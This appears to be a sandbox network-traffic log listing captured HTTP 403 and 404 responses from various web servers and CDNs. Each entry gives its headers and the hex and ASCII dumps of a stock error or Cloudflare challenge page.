                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:52:09 GMTContent-Type: text/html; charset=UTF-8Content-Length: 5702Connection: closeCross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Frame-Options: SAMEORIGINcf-mitigated: challengeCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=EUO3kWtES8d6YZu5UKVticH1r%2FeLNmW8pMGcJr5QKCKBRQgP4K9fu7aLXHtFqO7sllIDT1XgFDxNM2g3hZMXppV8aA%2BKjBP1EnYxK%2FWzBJ5sr4nXKy7lxUZv"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 81371a3dea3cdb56-LAXalt-svc: h3=":443"; ma=86400
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:52:10 GMTServer: ApachePragma: no-cacheCache-Control: no-cache, no-store, must-revalidateExpires: 0X-XSS-Protection: 1; mode=blockStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Content-Type-Options: nosniffReferrer-Policy: strict-origin-when-cross-originContent-Security-Policy: report-uri https://techtrans.deX-Frame-Options: SAMEORIGINPermissions-Policy: accelerometer=(), autoplay=(), camera=(), fullscreen=*, geolocation=(self), gyroscope=(), microphone=(), payment=*Upgrade: h2,h2cConnection: Upgrade, closeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: GET,PUT,POST,DELETEAccess-Control-Allow-Headers: Content-Type, AuthorizationX-Content-Security-Policy: img-src *; media-src * data:;X-Permitted-Cross-Domain-Policies: noneTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:52:10 GMTServer: ApachePragma: no-cacheCache-Control: no-cache, no-store, must-revalidateExpires: 0X-XSS-Protection: 1; mode=blockStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Content-Type-Options: nosniffReferrer-Policy: strict-origin-when-cross-originContent-Security-Policy: report-uri https://techtrans.deX-Frame-Options: SAMEORIGINPermissions-Policy: accelerometer=(), autoplay=(), camera=(), fullscreen=*, geolocation=(self), gyroscope=(), microphone=(), payment=*Upgrade: h2,h2cConnection: Upgrade, closeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: GET,PUT,POST,DELETEAccess-Control-Allow-Headers: Content-Type, AuthorizationX-Content-Security-Policy: img-src *; media-src * data:;X-Permitted-Cross-Domain-Policies: noneTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Mon, 09 Oct 2023 13:52:11 GMTContent-Type: text/htmlContent-Length: 548Connection: closeVary: Accept-Encoding
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:52:11 GMTServer: ApachePragma: no-cacheCache-Control: no-cache, no-store, must-revalidateExpires: 0X-XSS-Protection: 1; mode=blockStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Content-Type-Options: nosniffReferrer-Policy: strict-origin-when-cross-originContent-Security-Policy: report-uri https://techtrans.deX-Frame-Options: SAMEORIGINPermissions-Policy: accelerometer=(), autoplay=(), camera=(), fullscreen=*, geolocation=(self), gyroscope=(), microphone=(), payment=*Upgrade: h2,h2cConnection: Upgrade, closeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: GET,PUT,POST,DELETEAccess-Control-Allow-Headers: Content-Type, AuthorizationX-Content-Security-Policy: img-src *; media-src * data:;X-Permitted-Cross-Domain-Policies: noneTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Mon, 09 Oct 2023 13:52:12 GMTContent-Type: text/htmlContent-Length: 548Connection: closeVary: Accept-Encoding
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:52:27 GMTContent-Type: text/html; charset=UTF-8Content-Length: 5723Connection: closeCross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Frame-Options: SAMEORIGINcf-mitigated: challengeCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6z9oB6FDn4Je8HAvprexBlZY%2B0jBGpvCTuBj2DJ%2B0HJrQ4ehx%2BaueDXuB2Q3qdN4y4IW0qqUjuswb5XvFqM0olIIv3eNIUR7NOkjZvAqb0BfKz0uI86fE037"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 81371aace9dc2aec-LAXalt-svc: h3=":443"; ma=86400
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:52:28 GMTServer: ApachePragma: no-cacheCache-Control: no-cache, no-store, must-revalidateExpires: 0X-XSS-Protection: 1; mode=blockStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Content-Type-Options: nosniffReferrer-Policy: strict-origin-when-cross-originContent-Security-Policy: report-uri https://techtrans.deX-Frame-Options: SAMEORIGINPermissions-Policy: accelerometer=(), autoplay=(), camera=(), fullscreen=*, geolocation=(self), gyroscope=(), microphone=(), payment=*Upgrade: h2,h2cConnection: Upgrade, closeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: GET,PUT,POST,DELETEAccess-Control-Allow-Headers: Content-Type, AuthorizationX-Content-Security-Policy: img-src *; media-src * data:;X-Permitted-Cross-Domain-Policies: noneTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:52:28 GMTServer: ApachePragma: no-cacheCache-Control: no-cache, no-store, must-revalidateExpires: 0X-XSS-Protection: 1; mode=blockStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Content-Type-Options: nosniffReferrer-Policy: strict-origin-when-cross-originContent-Security-Policy: report-uri https://techtrans.deX-Frame-Options: SAMEORIGINPermissions-Policy: accelerometer=(), autoplay=(), camera=(), fullscreen=*, geolocation=(self), gyroscope=(), microphone=(), payment=*Upgrade: h2,h2cConnection: Upgrade, closeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: GET,PUT,POST,DELETEAccess-Control-Allow-Headers: Content-Type, AuthorizationX-Content-Security-Policy: img-src *; media-src * data:;X-Permitted-Cross-Domain-Policies: noneTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Mon, 09 Oct 2023 13:52:29 GMTContent-Type: text/htmlContent-Length: 548Connection: closeVary: Accept-Encoding
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Oct 2023 13:50:03 GMTContent-Type: text/htmlContent-Length: 19268Connection: keep-aliveServer: ApacheLast-Modified: Fri, 13 May 2022 08:04:11 GMTAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 2
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:50:03 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4514Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Mon, 09 Oct 2023 13:50:18 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9RBIWf3oMyh3pNbENeFuLWylYMzSXF0pRLNA5yvtoqtjiD%2B630nPHvDOwL%2Faf7n2Lj%2FND%2FE%2BSytUsEM8P0OOOMdsSUQBPfXtsF0BLvT9DmiKV%2Bg%2BPQrx%2FHCSiTe2us4V"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 81371729a8e22b66-LAXData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 Data Ascii: <!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" c
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 548Content-Type: text/htmlServer: Pepyaka/1.19.10X-Wix-Request-Id: 1696859403.78531675302096825418X-Content-Type-Options: nosniffAccept-Ranges: bytesDate: Mon, 09 Oct 2023 13:50:03 GMTX-Served-By: cache-bur-kbur8200124-BURX-Cache: MISSX-Seen-By: yvSunuo/8ld62ehjr5B7kA==,T7xPrjRFKDMHVv938PYVfx9slopJdhD+WySraMrpIY8=,m0j2EEknGIVUW/liY8BLLrxJXV2YgYThePtFG+29vnIG/hKs8AeY1T4OIbgnD+yxVia: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Mon, 09 Oct 2023 13:50:04 GMTContent-Type: text/htmlContent-Length: 552Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Oct 2023 13:50:06 GMTServer: ApacheContent-Length: 315Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:50:10 GMTServer: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Oct 2023 13:50:11 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 171X-Sorting-Hat-ShopId: 61843439788Server-Timing: processing;dur=13X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-us-west2,gcp-us-central1,gcp-us-central1X-Request-ID: 98236fc6-3f92-44b8-9b4d-93d8e9ea74d4CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wC42wriErp0hcXHOeaOc8g5IQ%2Bq4r3HTg3VJo3jYngfx%2Fs%2FUT2GpY%2FeRERDvFktxD9szaAI95Yb2IpZQB54JWp6Hqv7P10lisNRp6Wjvw36QuHg6QerC53CIGm0rvmDACg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=85.999966Server: cloudflareCF-RAY: 81371756ca0f08e2-LAXalt-svc: h3=":443"; ma=86400
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:50:11 GMTServer: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
